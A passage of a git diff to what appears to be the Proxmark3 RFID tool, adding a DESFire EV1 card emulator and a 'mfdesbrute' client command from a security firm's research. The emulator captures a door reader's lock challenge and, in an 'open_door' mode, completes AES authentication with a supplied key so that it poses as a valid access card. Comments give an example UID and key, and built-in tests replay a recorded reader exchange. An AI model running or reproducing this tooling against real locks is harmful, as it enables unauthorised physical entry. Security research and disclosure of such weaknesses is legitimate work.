iso14443a_setup(FPGA_HF_ISO14443A_TAGSIM_LISTEN); + + iso14a_set_timeout(201400); // 106 * 19ms default *100? + + int len = 0; + + int retval = PM3_SUCCESS; + + int cmdsRecvd = 0; + + // for some reason the first time the reader tries to start auth it needs to fail + bool send_auth_fail = false; + + uint8_t RandA[16] = {0x00}; + // tests depend on the value below. they'll fail if it's changed and for the attack it's fine for it to be static. + uint8_t RandB[] = {0x91, 0xad, 0xb6, 0x6c, 0xe7, 0x27, 0x53, 0xf3, 0x37, 0x5f, 0xe3, 0xa0, 0x23, 0xf7, 0xce, 0xdc}; + + uint8_t iv[16] = {0x00}; + + mbedtls_aes_context ctx; + + // aes key storage + struct desfire_key dfire_key = {0}; + desfirekey_t authentication_key = &dfire_key; + + // session key storage + struct desfire_key dfire_session_key = {0}; + desfirekey_t skey = &dfire_session_key; + + struct desfire_tag dfire_tag = {0}; + desfiretag_t tag = &dfire_tag; + DESFIRE(tag)->authentication_scheme = AS_NEW; + DESFIRE(tag)->session_key = skey; + int communication_settings = CMAC_COMMAND | MDCM_MACED; + + mbedtls_aes_init(&ctx); + Desfire_aes_key_new(enc_key, authentication_key); + + // run tests with + // hf mfdesbrute open_door -t 3 -u 043c5cda986380 -k e757178e13516a4f3171bc6ea85e165a + // set g_dbglevel to DBG_DEBUG in appmain.c to see the debug output + bool run_tests = false; + int test_counter = 0; + uint8_t sent_test_cmd[128] = {0x00}; + int sent_test_cmd_len = 0; + + clear_trace(); + set_tracing(true); + LED_A_ON(); + + // main loop + bool finished = false; + while (finished == false) { + // BUTTON_PRESS check done in GetIso14443aCommandFromReader + WDT_HIT(); + + tag_response_info_t *p_response = NULL; + + if (run_tests) { + run_tests = test_emulate_reader(test_counter, receivedCmd, &len); + } else { + // Clean receive command buffer + if (GetIso14443aCommandFromReader(receivedCmd, receivedCmdPar, &len) == false) { + Dbprintf("Emulator stopped. Trace length: %d ", BigBuf_get_traceLen()); + retval = PM3_EOPABORTED; + break; + } + } + + if (receivedCmd[0] == ISO14443A_CMD_WUPA && len == 1) { // Received a WAKEUP + p_response = &responses[RESP_INDEX_ATQA]; + } else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && + len == 2) { // Received request for UID (cascade 1) + p_response = &responses[RESP_INDEX_UIDC1]; + } else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_2 && + len == 2) { // Received request for UID (cascade 2) + p_response = &responses[RESP_INDEX_UIDC2]; + } else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_3 && + len == 2) { // Received request for UID (cascade 3) + p_response = &responses[RESP_INDEX_UIDC3]; + } else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && + len == 9) { // Received a SELECT (cascade 1) + p_response = &responses[RESP_INDEX_SAKC1]; + } else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_2 && + len == 9) { // Received a SELECT (cascade 2) + p_response = &responses[RESP_INDEX_SAKC2]; + } else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_3 && + len == 9) { // Received a SELECT (cascade 3) + p_response = &responses[RESP_INDEX_SAKC3]; + } else if (receivedCmd[0] == ISO14443A_CMD_PPS) { + p_response = &responses[RESP_INDEX_PPS]; + } else if (receivedCmd[0] == MIFARE_ULEV1_VERSION && len == 3 && (tagType == 2 || tagType == 7)) { + p_response = &responses[RESP_INDEX_VERSION]; + } else if (receivedCmd[0] == ISO14443A_CMD_RATS && len == 4) { // Received a RATS request + p_response = &responses[RESP_INDEX_RATS]; + } else if (receivedCmd[0] == 0x26 && len == 1) { // REQA + uint8_t r[] = {0x44, 0x03}; + EmSendCmd(r, sizeof(r)); + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } else if (receivedCmd[0] == 0x02 && receivedCmd[1] == 0x60) { // Get Version details of card + uint8_t r[] = {0x02, 0xaf, 0x04, 0x01, 0x02, 0x12, 0x00, 0x18, 0x05, 0x28, 0x42}; + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } else if (receivedCmd[0] == 0x03 && receivedCmd[1] == 0xaf && receivedCmd[2] == 0x35 && + receivedCmd[3] == 0x69) { // Get Version details of card 2 + uint8_t r[] = {0x03, 0xaf, 0x04, 0x01, 0x01, 0x02, 0x01, 0x18, 0x05, 0x64, 0x8b}; + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } else if (receivedCmd[0] == 0x02 && receivedCmd[1] == 0xaf && receivedCmd[2] == 0xed && + receivedCmd[3] == 0x70) { // Get Version details of card 3 + uint8_t r[] = {0x02, 0x00, 0x04, 0x3c, 0x5c, 0xda, 0x98, 0x63, 0x80, + 0xce, 0xd8, 0x50, 0x59, 0x60, 0x08, + 0x19, 0xab, 0xa7 + }; + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } else if ((receivedCmd[0] == 0x02 || receivedCmd[0] == 0x03) && + receivedCmd[1] == MIFARE_EV1_SELECT_APP) { + // the reader will sequentially try AIDs starting with f518f0 + // it seems f518f0 can always be used, even if the real tags use a bigger AID + if (receivedCmd[2] >= 0xf0 && receivedCmd[3] == 0x18 && + receivedCmd[4] == 0xf5) { + uint8_t r[4] = {0x00}; + r[0] = receivedCmd[0]; + AddCrc14A(r, sizeof(r) - 2); + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + + send_auth_fail = false; + } else { + // unknown AID? not sure. also covers special case of + // 5a 71 17 05 in the very beginning that always + // (needs to?) fail(s) + uint8_t r[4] = {0x00}; + r[0] = receivedCmd[0]; + r[1] = 0xa0; + AddCrc14A(r, sizeof(r) - 2); + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } + } else if ((receivedCmd[0] == 0x02 || receivedCmd[0] == 0x03) && + receivedCmd[1] == MIFARE_EV1_AUTH_AES) { + if (receivedCmd[2] == 0x01) { + // reader sends 03 aa 01 76 09 after selecting application 71 17 05. + // the tag needs to reply with 0xae (authentication error) after + // the reader sent its reply to this challenge + send_auth_fail = true; + uint8_t r[] = {0x03, 0xaf, 0x78, 0xd2, 0x9d, 0x9f, 0xd0, 0x17, + 0xe7, 0xca, 0x48, 0x1d, 0x8b, 0xb7, 0xd9, + 0xcb, 0x6a, 0xdd, 0x7c, 0xe0 + }; + EmSendCmd(r, sizeof(r)); + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } else { + uint8_t r[20] = {0x00}; + size_t data_len = sizeof(RandB); + + r[0] = receivedCmd[0]; + r[1] = 0xaf; + + memcpy(r + 2, RandB, data_len); + + mifare_cypher_blocks_chained(DESFIRE(tag), authentication_key, + iv, r + 2, data_len, MCD_SEND, + MCO_ENCYPHER); + + memcpy(iv, r + 2, 16); + + AddCrc14A(r, sizeof(r) - 2); + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } + } else if ((receivedCmd[0] == 0x02 || receivedCmd[0] == 0x03) && + receivedCmd[1] == MIFARE_EV1_AUTH_AES_2) { + if (send_auth_fail) { + uint8_t r[4] = {0x00}; + r[0] = receivedCmd[0]; + r[1] = 0xae; + AddCrc14A(r, sizeof(r) - 2); + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } else if (purpose == CMD_HF_MIFARE_EV1_GET_LOCK_CHALLENGE) { + DbpString("Tag challenge: "); + Dbhexdump(16, iv, false); + DbpString("Lock challenge: "); + Dbhexdump(32, receivedCmd + 2, false); + return; + } else if (purpose == CMD_HF_MIFARE_EV1_OPEN_DOOR) { + uint8_t both[32] = {0x00}; + size_t data_len = sizeof(both); + + memcpy(both, receivedCmd + 2, data_len); + mifare_cypher_blocks_chained(DESFIRE(tag), authentication_key, + iv, both, data_len, MCD_RECEIVE, + MCO_DECYPHER); + + // save rand A for session key construction + memcpy(RandA, both, 16); + + uint8_t rotRandA[16] = {0x00}; + memcpy(rotRandA, both, 16); + rol(rotRandA, 16); + + uint8_t r[20] = {0x00}; + r[0] = receivedCmd[0]; + r[1] = 0x00; + + memcpy(r + 2, rotRandA, 16); + mifare_cypher_blocks_chained(DESFIRE(tag), authentication_key, + iv, r + 2, sizeof(rotRandA), + MCD_SEND, MCO_ENCYPHER); + + AddCrc14A(r, sizeof(r) - 2); + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } + } else if ((receivedCmd[0] == 0x02 || receivedCmd[0] == 0x03) && + receivedCmd[1] == MIFARE_EV1_GET_FILE_INFO && + receivedCmd[2] == 0x00) { // get file info + Desfire_session_key_new(RandA, RandB, authentication_key, + DESFIRE(tag)->session_key); + + cmac_generate_subkeys(DESFIRE(tag)->session_key); + + uint8_t read_file[16] = {0x00}; + read_file[0] = 0xf5; + read_file[1] = 0x00; + read_file[2] = 0xc0; + read_file[3] = 0x48; + size_t read_file_len = 2; + mifare_cryto_postprocess_data(tag, read_file, &read_file_len, + communication_settings); + + // here the status byte (0x00) needs to be appended for the MAC + // calculation, but shouldn't still be appended when sending + uint8_t file_info[24] = {0x00}; + file_info[4] = 0x07; + size_t file_info_len = 8; + uint8_t *resp = mifare_cryto_preprocess_data(tag, file_info, + &file_info_len, 0, + communication_settings); + + uint8_t r[19] = {0x00}; + r[0] = receivedCmd[0]; + r[6] = 0x07; + memcpy(r + 9, resp + 8, 8); + AddCrc14A(r, sizeof(r) - 2); + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + memcpy(sent_test_cmd, r, sizeof(r)); + sent_test_cmd_len = sizeof(r); + } + } else if ((receivedCmd[0] == 0x02 || receivedCmd[0] == 0x03) && + receivedCmd[1] == MIFARE_EV1_READ_DATA && + receivedCmd[6] == 0x07) { + // read the contents of the file containing the UID + uint8_t get_uid[] = {0xbd, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00}; + size_t get_uid_len = sizeof(get_uid); + mifare_cryto_postprocess_data(tag, get_uid, &get_uid_len, + communication_settings); + + uint8_t uid_and_status[] = {0x04, 0x3c, 0x5c, 0xda, 0x98, 0x63, 0x80, + 0x00 + }; + uint8_t file_contents[24] = {0x00}; + memcpy(file_contents, uid_and_status, 8); + size_t file_contents_len = 8; + uint8_t *resp2 = mifare_cryto_preprocess_data(tag, file_contents, + &file_contents_len, 0, + communication_settings); + + uint8_t r[19] = {0x00}; + r[0] = receivedCmd[0]; + + memcpy(r + 2, uid_and_status, 7); // skip status byte + memcpy(r + 9, resp2 + 8, 8); // copy mac + AddCrc14A(r, sizeof(r) - 2); + EmSendCmd(r, sizeof(r)); + p_response = NULL; + if (run_tests) { + sent_test_cmd_len = sizeof(r); + memcpy(sent_test_cmd, r, sent_test_cmd_len); + } + } else { + // Never seen this command before + LogTrace(receivedCmd, Uart.len, + Uart.startTime * 16 - DELAY_AIR2ARM_AS_TAG, + Uart.endTime * 16 - DELAY_AIR2ARM_AS_TAG, Uart.parity, + true); + if (g_dbglevel >= DBG_DEBUG) { + Dbprintf("Received unknown command (len=%d):", len); + Dbhexdump(len, receivedCmd, false); + } + } + + cmdsRecvd++; + + // Send response + EmSendPrecompiledCmd(p_response); + + if (run_tests) { + if (p_response == NULL) { + test_verify_tag_response(test_counter, sent_test_cmd, + sent_test_cmd_len); + } else { + test_verify_tag_response(test_counter, p_response->response, + p_response->response_n); + } + ++test_counter; + } + } + + switch_off(); + + set_tracing(false); + BigBuf_free_keep_EM(); + + if (g_dbglevel >= DBG_EXTENDED) { + Dbprintf("-[ Num of received cmd [%d]", cmdsRecvd); + } + + // TODO canceling the simulator is broken + // after the button is pressed, the client shows "[#] Emulator stopped. Trace length: 850" + // but it's not possible to send any new commands using the client. + // the command prompt "[usb] pm3 --> " does not appear + reply_ng(CMD_HF_MIFARE_SIMULATE, retval, NULL, 0); +} + +// returns false if test_counter is too big to stop testing +bool test_emulate_reader(uint8_t test_counter, uint8_t *receivedCmd, int *len) { + switch (test_counter) { + // 0-5 and 13-18 can't be tested for from SimulateIso14443aTag + + // 0 REQA + // 1 ANTICOLL + // 2 SELECT_UID + // 3 ANTICOLL -2 + // 4 ANTICOLL -2 + // 5 RATS + // 6 GET VERSION + // 7 AF (Additional Frame) + // 8 AF (Additional Frame) + // 9 WRONG SELECT UID + // 10 SELECT AID 71 17 f5 + // 11 AUTH AES + // 12 READER AES CHALLENGE REPLY (TAG AE) + // 13 REQA + // 14 ANTICOLL + // 15 SELECT_UID + // 16 ANTICOLL -2 + // 17 ANTICOLL -2 + // 18 RATS + // 19 SELECT AID f0 18 f5 + // 20 AUTH AES + // 21 CHALLENGE REPLY + // 22 GET FILE 0x00 INFO + // 23 READ FILE CONTENTS + case 0: + case 13: { + // REQA + uint8_t cmd[] = {0x26}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + case 1: + case 14: { + // ANTICOLL + uint8_t cmd[] = {0x93, 0x20}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 2: + case 15: { + // SELECT_UID + uint8_t cmd[] = {0x93, 0x70, 0x88, 0x04, 0x3c, 0x5c, 0xec, 0x3d, 0x0f}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 3: + case 16: { + // ANTICOLL -2 + uint8_t cmd[] = {0x95, 0x20}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 4: + case 17: { + // ANTICOLL -2 + uint8_t cmd[] = {0x95, 0x70, 0xda, 0x98, 0x63, 0x80, 0xa1, 0xbf, 0xeb}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 5: + case 18: { + // RATS + uint8_t cmd[] = {0xe0, 0x50, 0xbc, 0xa5}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 6: { + // GET VERSION + uint8_t cmd[] = {0x02, 0x60, 0x16, 0x4e}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 7: { + // AF (Additional Frame) + uint8_t cmd[] = {0x03, 0xaf, 0x35, 0x69}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 8: { + // AF (Additional Frame) + uint8_t cmd[] = {0x02, 0xaf, 0xed, 0x70}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 9: { + // WRONG SELECT UID + uint8_t cmd[] = {0x03, 0x5a, 0x71, 0x17, 0x05, 0x12, 0x41}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 10: { + // SELECT AID 71 17 f5 + uint8_t cmd[] = {0x02, 0x5a, 0x71, 0x17, 0xf5, 0xd9, 0xbd}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 11: { + // AUTH AES + uint8_t cmd[] = {0x03, 0xaa, 0x01, 0x76, 0x09}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 12: { + // READER AES CHALLENGE REPLY + uint8_t cmd[] = {0x02, 0xaf, 0x81, 0x74, 0xfc, 0xdd, 0x94, 0xb7, + 0x34, 0x17, 0xb8, 0xa9, 0xa4, 0x15, 0xdc, 0x1b, + 0x80, 0x57, 0x35, 0x20, 0x67, 0x23, 0x7a, 0x4f, + 0xe2, 0x96, 0x6b, 0x46, 0xfd, 0x24, 0x2b, 0x34, + 0xf4, 0xe5, 0x80, 0x36 + }; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 19: { + // SELECT AID f0 18 f5 + uint8_t cmd[] = {0x02, 0x5a, 0xf0, 0x18, 0xf5, 0x21, 0x68}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 20: { + // request auth challenge + uint8_t cmd[] = {0x03, 0xaa, 0x00, 0xff, 0x18}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + // reply to tag's auth challenge + reader challenge + case 21: { + uint8_t cmd[] = {0x02, 0xaf, 0x97, 0xfe, 0x4b, 0x5d, 0xe2, 0x41, + 0x88, 0x45, 0x8d, 0x10, 0x29, 0x59, 0xb8, 0x88, + 0x93, 0x8c, 0x98, 0x8e, 0x96, 0xfb, 0x98, 0x46, + 0x9c, 0xe7, 0x42, 0x6f, 0x50, 0xf1, 0x08, 0xea, + 0xa5, 0x83, 0x8a, 0x32 + }; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 22: { + // request file info + uint8_t cmd[] = {0x03, 0xf5, 0x00, 0xc0, 0x48}; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + case 23: { + // request file contents (the tag's UID) + uint8_t cmd[] = {0x02, 0xbd, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00, + 0x00, 0xc4, 0x15 + }; + *len = sizeof(cmd); + memcpy(receivedCmd, cmd, *len); + break; + } + + default: + return false; + } + return true; +} + +void test_verify_tag_response(uint8_t test_counter, uint8_t *sent_test_cmd, + uint8_t sent_test_cmd_len) { + uint8_t expected_answer[32] = {0x00}; + size_t expected_answer_len = 0; + bool success = false; + + switch (test_counter) { + case 0: + case 13: { + uint8_t tmp[] = {0x44, 0x03}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 1: + case 14: { + uint8_t tmp[] = {0x88, 0x04, 0x3c, 0x5c, 0xec}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 2: + case 15: { + uint8_t tmp[] = {0x24, 0xd8, 0x36}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 3: + case 16: { + uint8_t tmp[] = {0xda, 0x98, 0x63, 0x80, 0xa1}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 4: + case 17: { + uint8_t tmp[] = {0x20, 0xfc, 0x70}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 5: + case 18: { + uint8_t tmp[] = {0x06, 0x75, 0x77, 0x81, 0x02, 0x80, 0x02, 0xf0}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 6: { + uint8_t tmp[] = {0x02, 0xaf, 0x04, 0x01, 0x02, 0x12, 0x00, 0x18, + 0x05, 0x28, 0x42 + }; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 7: { + uint8_t tmp[] = {0x03, 0xaf, 0x04, 0x01, 0x01, 0x02, 0x01, 0x18, + 0x05, 0x64, 0x8b + }; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 8: { + uint8_t tmp[] = {0x02, 0x00, 0x04, 0x3c, 0x5c, 0xda, 0x98, 0x63, + 0x80, 0xce, 0xd8, 0x50, 0x59, 0x60, 0x08, 0x19, + 0xab, 0xa7 + }; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 9: { + uint8_t tmp[] = {0x03, 0xa0, 0xc2, 0x91}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 10: { + uint8_t tmp[] = {0x02, 0xa0, 0x1a, 0x88}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 11: { + // the contents don't really matter here, since the reader accepts + // anything and the tag will return AE next + // TODO: this test doesn't make sure that the CRC is correct + uint8_t tmp[] = {0x03, 0xaf}; //, 0xe8, 0x26, 0xfc, 0xe2, 0xbe, 0xdf, 0xef, 0x37, 0x83, 0xda, 0xf9, 0xdf, 0x0d, 0x82, 0x28, 0xd0, 0x18, 0xf7}; + if (memcmp(sent_test_cmd, tmp, sizeof(tmp)) == 0) { + success = true; + } + break; + } + + case 12: { + uint8_t tmp[] = {0x02, 0xae, 0x64, 0x61}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 19: { + uint8_t tmp[] = {0x02, 0x00, 0x10, 0x2d}; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 20: { + uint8_t tmp[] = {0x03, 0xaf, 0x3f, 0xda, 0x93, 0x3e, 0x29, 0x53, + 0xca, 0x5e, 0x6c, 0xfb, 0xbf, 0x95, 0xd1, 0xb5, + 0x1d, 0xdf, 0x95, 0x14 + }; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 21: { + uint8_t tmp[] = {0x02, 0x00, 0xed, 0x93, 0x55, 0xf6, 0x10, 0x97, + 0xf8, 0x7b, 0x72, 0xe8, 0x37, 0xed, 0x3f, 0xd4, + 0x8c, 0x4d, 0x40, 0x70 + }; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 22: { + uint8_t tmp[] = {0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00, + 0x00, 0xa4, 0xf8, 0x4d, 0xb2, 0x60, 0xb0, 0x2e, + 0x47, 0xcf, 0x14 + }; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + case 23: { + uint8_t tmp[] = {0x02, 0x00, 0x04, 0x3c, 0x5c, 0xda, 0x98, 0x63, + 0x80, 0xe6, 0x9c, 0x0f, 0xfe, 0x76, 0x25, 0x18, + 0x56, 0xa6, 0xd5 + }; + expected_answer_len = sizeof(tmp); + memcpy(expected_answer, tmp, expected_answer_len); + break; + } + + default: + break; + } + + // this response is different but it still works + if (test_counter == 2 || test_counter == 15) { + return; + } + if (success || + (memcmp(expected_answer, sent_test_cmd, expected_answer_len) == 0 + && sent_test_cmd_len == expected_answer_len)) { + Dbprintf("test %i successful!", test_counter); + } else { + Dbprintf("test %i resulted in an unexpected answer:", test_counter); + Dbhexdump(sent_test_cmd_len, sent_test_cmd, false); + } +} diff --git a/armsrc/mfdessimulate.h b/armsrc/mfdessimulate.h new file mode 100644 index 0000000000..4e46cf7751 --- /dev/null +++ b/armsrc/mfdessimulate.h @@ -0,0 +1,10 @@ + + +#ifndef __MFDESSIM_H +#define __MFDESSIM_H + +#include "iso14443a.h" + +void SimulateMfDesfireEv1(uint8_t tagType, uint16_t flags, uint8_t *uid, uint8_t *enc_key, int purpose); + +#endif /* __MFDESSIM_H */ diff --git a/client/CMakeLists.txt b/client/CMakeLists.txt index f6a0c9e9f5..e6440cfda2 100644 --- a/client/CMakeLists.txt +++ b/client/CMakeLists.txt @@ -285,6 +285,7 @@ set (TARGET_SOURCES ${PM3_ROOT}/client/src/cmdhflto.c ${PM3_ROOT}/client/src/cmdhfmf.c ${PM3_ROOT}/client/src/cmdhfmfdes.c + ${PM3_ROOT}/client/src/cmdhfmfdesbrute.c ${PM3_ROOT}/client/src/cmdhfmfhard.c ${PM3_ROOT}/client/src/cmdhfmfp.c ${PM3_ROOT}/client/src/cmdhfmfu.c diff --git a/client/Makefile b/client/Makefile index 4debb130f7..10f9217b21 100644 --- a/client/Makefile +++ b/client/Makefile @@ -563,6 +563,7 @@ SRCS = mifare/aiddesfire.c \ cmdhflto.c \ cmdhfmf.c \ cmdhfmfdes.c \ + cmdhfmfdesbrute.c \ cmdhfmfhard.c \ cmdhfmfu.c \ cmdhfmfp.c \ diff --git a/client/src/cmdhf.c b/client/src/cmdhf.c index 1e29eb1398..e21640fcdd 100644 --- a/client/src/cmdhf.c +++ b/client/src/cmdhf.c @@ -34,6 +34,7 @@ #include "cmdhfmfu.h" // ULTRALIGHT/NTAG etc #include "cmdhfmfp.h" // Mifare Plus #include "cmdhfmfdes.h" // DESFIRE +#include "cmdhfmfdesbrute.h" // partial DESFIRE EV1 emulation #include "cmdhftopaz.h" // TOPAZ #include "cmdhffelica.h" // ISO18092 / FeliCa #include "cmdhffido.h" // FIDO authenticators @@ -429,6 +430,7 @@ static command_t CommandTable[] = { {"mfp", CmdHFMFP, AlwaysAvailable, "{ MIFARE Plus RFIDs... }"}, {"mfu", CmdHFMFUltra, AlwaysAvailable, "{ MIFARE Ultralight RFIDs... }"}, {"mfdes", CmdHFMFDes, AlwaysAvailable, "{ MIFARE Desfire RFIDs... }"}, + {"mfdesbrute", CmdHfMfDesBrute, AlwaysAvailable, "{ MIFARE DESFIRE EV1 Brute Forcing... }"}, {"seos", CmdHFSeos, AlwaysAvailable, "{ SEOS RFIDs... }"}, {"st25ta", CmdHFST25TA, AlwaysAvailable, "{ ST25TA RFIDs... }"}, {"thinfilm", CmdHFThinfilm, AlwaysAvailable, "{ Thinfilm RFIDs... }"}, diff --git a/client/src/cmdhfmfdesbrute.c b/client/src/cmdhfmfdesbrute.c new file mode 100644 index 0000000000..296310faa5 --- /dev/null +++ b/client/src/cmdhfmfdesbrute.c @@ -0,0 +1,246 @@ +//----------------------------------------------------------------------------- +// Copyright (C) X41 D-Sec GmbH, Yasar Klawohn, Markus Vervier +// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details. +// +// This program is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// This program is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// See LICENSE.txt for the text of the license. +//----------------------------------------------------------------------------- +// High frequency ISO14443A commands +//----------------------------------------------------------------------------- +#include "cmdhfmfdesbrute.h" +#include +#include +#include "cmdparser.h" // command_t +#include "commonutil.h" // ARRAYLEN +#include "comms.h" // clearCommandBuffer +#include "cmdtrace.h" +#include "cliparser.h" +#include "cmdhfmf.h" +#include "cmdhfmfu.h" +#include "iso7816/iso7816core.h" +#include "emv/emvcore.h" +#include "ui.h" +#include "crc16.h" +#include "util_posix.h" // msclock +#include "aidsearch.h" +#include "cmdhf.h" // handle HF plot +#include "cliparser.h" +#include "protocols.h" // definitions of ISO14A/7816 protocol, MAGIC_GEN_1A +#include "iso7816/apduinfo.h" // GetAPDUCodeDescription +#include "nfc/ndef.h" // NDEFRecordsDecodeAndPrint +#include "cmdnfc.h" // print_type4_cc_info +#include "fileutils.h" // saveFile +#include "atrs.h" // getATRinfo + +static int CmdHelp(const char *Cmd); + +// ## simulate iso14443a tag +int CmdHfMfDesBruteGetChallenge(const char *Cmd) { + CLIParserContext *ctx; + CLIParserInit(&ctx, "hf mfdesbrute get_challenge", + "Tools for attacking weakly generated keys", // TODO fix description + "hf mfdesbrute get_challenge -t -u "); + + void *argtable[] = { + arg_param_begin, + arg_int1("t", "type", "<1-10> ", "Simulation type to use"), + arg_str0("u", "uid", "", "7 byte UID"), + //arg_lit0("v", "verbose", "verbose output"), + arg_param_end + }; + CLIExecWithReturn(ctx, Cmd, argtable, false); + + int tagtype = arg_get_int(ctx, 1); + + int uid_len = 0; + uint8_t uid[10] = {0}; + CLIGetHexWithReturn(ctx, 2, uid, &uid_len); + + uint16_t flags = 0; + bool useUIDfromEML = true; + + if (uid_len > 0) { + if (uid_len == 7) { + flags |= FLAG_7B_UID_IN_DATA; + } else { + PrintAndLogEx(ERR, "Please specify a 7 byte UID"); + CLIParserFree(ctx); + return PM3_EINVARG; + } + PrintAndLogEx(SUCCESS, "Emulating a" _YELLOW_("DESFIRE EV1 tag")" with " _GREEN_("%d byte UID (%s)"), uid_len, sprint_hex(uid, uid_len)); + useUIDfromEML = false; + } + + CLIParserFree(ctx); + + sector_t *k_sector = NULL; + uint8_t k_sectorsCount = 40; + + if (useUIDfromEML) { + flags |= FLAG_UID_IN_EMUL; + } + + struct { + uint8_t tagtype; + uint16_t flags; + uint8_t uid[10]; + uint8_t key[16]; + } PACKED payload; + + payload.tagtype = tagtype; + payload.flags = flags; + memcpy(payload.uid, uid, uid_len); + memset(payload.key, 0, 16); + + clearCommandBuffer(); + SendCommandNG(CMD_HF_MIFARE_EV1_GET_LOCK_CHALLENGE, (uint8_t *)&payload, sizeof(payload)); + PacketResponseNG resp; + + PrintAndLogEx(INFO, "Press pm3-button to abort simulation"); + bool keypress = kbd_enter_pressed(); + while (!keypress) { + + if (WaitForResponseTimeout(CMD_HF_MIFARE_EV1_GET_LOCK_CHALLENGE, &resp, 1500) == 0) continue; + if (resp.status != PM3_SUCCESS) break; + + keypress = kbd_enter_pressed(); + } + + if (keypress) { + if ((flags & FLAG_NR_AR_ATTACK) == FLAG_NR_AR_ATTACK) { + // inform device to break the sim loop since client has exited + SendCommandNG(CMD_BREAK_LOOP, NULL, 0); + } + + if 